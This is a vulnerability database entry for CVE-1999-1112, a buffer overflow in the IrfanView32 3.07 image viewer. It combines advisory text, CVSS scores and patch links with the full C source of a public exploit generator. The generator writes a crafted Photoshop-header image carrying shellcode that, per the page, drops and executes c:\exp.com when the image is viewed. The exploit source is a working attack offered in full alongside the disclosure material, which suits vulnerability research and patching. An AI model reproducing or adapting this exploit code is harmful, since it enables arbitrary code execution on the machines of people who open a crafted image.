CVE-1999-1112
CVSS 7.5
Published: 1999-11-09 00:00:00
Revised: 2008-09-05 16:18:44
NMCOES

[Original] Buffer overflow in IrfanView32 3.07 and earlier allows attackers to execute arbitrary commands via a long string after the "8BPS" image type in a Photo Shop image header.


[CNNVD] IrfanView32 Image File Buffer Overflow Vulnerability (CNNVD-199911-032)

        IrfanView32 3.07 and earlier versions contain a buffer overflow vulnerability. An attacker can execute arbitrary instructions via a long string placed after the "8BPS" image type in a Photo Shop image header.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may allow system files to be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1112
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1112
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199911-032
(Official data source) CNNVD

- Other links and resources

http://xforce.iss.net/static/3549.php
(VENDOR_ADVISORY)  XF  irfan-view32-bo(3549)
http://www.securityfocus.com/bid/781
(VENDOR_ADVISORY)  BID  781
http://www.securityfocus.com/archive/1/34066
(VENDOR_ADVISORY)  BUGTRAQ  19991109 Irfan view 3.07 buffer overflow
http://stud4.tuwien.ac.at/~e9227474/main2.html
(VENDOR_ADVISORY)  MISC  http://stud4.tuwien.ac.at/~e9227474/main2.html

- Vulnerability information

IrfanView32 Image File Buffer Overflow Vulnerability
High risk  Buffer overflow
1999-11-09 00:00:00 2005-10-20 00:00:00
Remote / Local
        IrfanView32 3.07 and earlier versions contain a buffer overflow vulnerability. An attacker can execute arbitrary instructions via a long string placed after the "8BPS" image type in a Photo Shop image header.

- Advisories and patches

        Irfan Skiljan has released version 3.10, available at:
        http://stud1.tuwien.ac.at/~e9227474/iview310.zip

- Vulnerability information (19610)

Irfan Skiljan IrfanView32 3.0.7 Image File Buffer Overflow Vulnerability (EDBID:19610)
windows local
1999-11-09 Verified
0 UNYUN
N/A [Download]
source: http://www.securityfocus.com/bid/781/info

IrfanView32, a freeware image viewer, has a problem in the handling of Adobe Photoshop generated jpegs. If a .jpg file is opened for viewing that contains the Adobe Photoshop marker in the header (8BPS) followed by a long string, the program will crash. It is possible to insert code in the string for execution. 

/*=============================================================================
   Irfan View 3.07 Exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================
*/

#include    <stdio.h>
#include    <stdlib.h>      // exit()
#include    <string.h>
#include    <windows.h>

#define     MAXBUF          0x22e0
#define     RETADR          0x31E
#define     FAKE_ADR        0x80101010  // Writable buffer pointer

#define     JMPESP_ADR      0xbffca4f7  // You have to change this value
                                        // for non-Japanese Windows98.
#define     HEAD            "8BPS\0"

unsigned char   exploit_code[300]={
 0xEB,0x4F,0x5F,0x32,0xC0,0x88,0x47,0x0A,0x88,0x47,0x10,0x88,0x47,0x17,0x88,0x47,
 0x1E,0x88,0x47,0x23,0x88,0x47,0x26,0x88,0x47,0x2D,0x88,0x47,0x3C,0x57,0xB8,0x50,
 0x77,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xDB,0xB3,0x0B,0x8B,0xC7,0x03,0xC3,0x50,
 0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x33,0xDB,0xB3,0x24,0x8B,0xC7,
 0x03,0xC3,0x50,0xB3,0x32,0x8B,0xC7,0x03,0xC3,0x50,0xFF,0xD1,0x89,0x47,0x2E,0xEB,
 0x02,0xEB,0x71,0x33,0xDB,0xB3,0x18,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,
 0xF7,0xBF,0xFF,0xD0,0x8B,0xC8,0x8B,0x47,0x2E,0x50,0x33,0xC0,0xB0,0x03,0x90,0x90,
 0x50,0xB0,0x01,0x50,0x33,0xDB,0xB3,0x3D,0x03,0xDF,0x53,0xFF,0xD1,0x33,0xDB,0xB3,
 0x11,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0x5F,
 0x2E,0x53,0xFF,0xD0,0x33,0xDB,0xB3,0x27,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,
 0x6E,0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0xB3,0x32,0x8B,0xCF,0x03,0xCB,0x51,0xFF,0xD0,
 0x33,0xDB,0x53,0xB3,0x1F,0x8B,0xC7,0x03,0xC3,0x50,0x56,0xB8,0x28,0x6E,0xF7,0xBF,
 0xFF,0xD0,0xFF,0xD0,0xE8,0x39,0xFF,0xFF,0xFF,0x00
};

// "exp.com"
unsigned char   exploit_data[1000]={
0xb0,0x13,0xcd,0x10,0xb0,0x0f,0xfe,0xc0,0xb4,0x0c,0xcd,0x10,0x03,0xd1,0x41,0x3c,
0x20,0x77,0xf1,0xeb,0xf1,0x00
};

int  GetProcAddress_fcp[4]={0x32,0x5e,0x88,0xbc};

char string_buffer[1000]  ="msvcrt.dll_fopen_fclose_fwrite_exit_wb_system_****";
char filename[100]        = "c:\\exp.com";

int main(int argc,char *argv[])
{
    // MAXBUF+1: the original declared buf[MAXBUF] and then wrote buf[MAXBUF]=0,
    // one byte past the end of the generator's own stack buffer.
    unsigned char   buf[MAXBUF+1],l1,l2;
    unsigned int    ip,p1,p2,i;
    FILE            *fp;

    if (argc<2){
        printf("usage : %s outputfile\n",argv[0]);
        exit(1);
    }
    memset(buf,0x90,MAXBUF); buf[MAXBUF]=0;
    memcpy(buf,HEAD,4);

    ip=JMPESP_ADR;
    buf[RETADR  ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    buf[RETADR+6]=0xeb;
    buf[RETADR+7]=0x04;

    ip=FAKE_ADR;
    buf[RETADR+8]=ip&0xff;
    buf[RETADR+9]=(ip>>8)&0xff;
    buf[RETADR+10]=(ip>>16)&0xff;
    buf[RETADR+11]=(ip>>24)&0xff;

    p1=(unsigned int)LoadLibrary;
    p2=(unsigned int)GetProcAddress;
    exploit_code[0x1f]=p1&0xff;
    exploit_code[0x20]=(p1>>8)&0xff;
    exploit_code[0x21]=(p1>>16)&0xff;
    exploit_code[0x22]=(p1>>24)&0xff;

    for (i=0;i<4;i++){
        exploit_code[GetProcAddress_fcp[i]  ]=p2&0xff;
        exploit_code[GetProcAddress_fcp[i]+1]=(p2>>8)&0xff;
        exploit_code[GetProcAddress_fcp[i]+2]=(p2>>16)&0xff;
        exploit_code[GetProcAddress_fcp[i]+3]=(p2>>24)&0xff;
    }

    l1=(unsigned char)(strlen(filename)+strlen(string_buffer));
    l2=(unsigned char)strlen((char *)exploit_data);
    strcat(string_buffer,filename );
    strcat(string_buffer,"_" );
    strcat(string_buffer,(char *)exploit_data );
    strcat((char *)exploit_code, string_buffer );
    exploit_code[0x1c]  = l1;
    exploit_code[0x6d]  = l2;
    exploit_code[0x77]  = l1+1;

    memcpy(buf+RETADR+12,exploit_code,strlen((char *)exploit_code));

    if ((fp=fopen(argv[1],"wb"))==NULL){
        printf("Can not write file '%s'\n",argv[1]);
        exit(1);
    }

    fwrite(buf,1,MAXBUF,fp);
    fclose(fp);
    printf("Done.\n");
    return 0;
}


- Vulnerability information

10237
IrfanView32 8BPS PhotoShop Image Header Arbitrary Command Execution
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public

- Vulnerability description

A local overflow exists in IrfanView32. The viewer fails to check the bounds of header information resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

1999-11-09 Unknown
1999-11-09 Unknown

- Solution

Upgrade to version 3.36 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

- Vulnerability information

IrfanView32 Image File Buffer Overflow Vulnerability
Boundary Condition Error 781
Yes Yes
1999-11-09 12:00:00 2009-07-11 12:56:00
Posted to Bugtraq on November 9, 1999 by UNYUN <shadowpenguin@backsection.net>.

- Affected software versions

Irfan Skiljan IrfanView32 3.0.7
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0

- Vulnerability discussion

IrfanView32, a freeware image viewer, has a problem in the handling of Adobe Photoshop generated jpegs. If a .jpg file is opened for viewing that contains the Adobe Photoshop marker in the header (8BPS) followed by a long string, the program will crash. It is possible to insert code in the string for execution.

- Exploit

This exploit will generate a jpg image that when viewed by IrfanView will create a file, exp.com, in the root of C:. This file will then be executed.

- Solution

Irfan Skiljan has released version 3.10, available at:
http://stud1.tuwien.ac.at/~e9227474/iview310.zip

- References
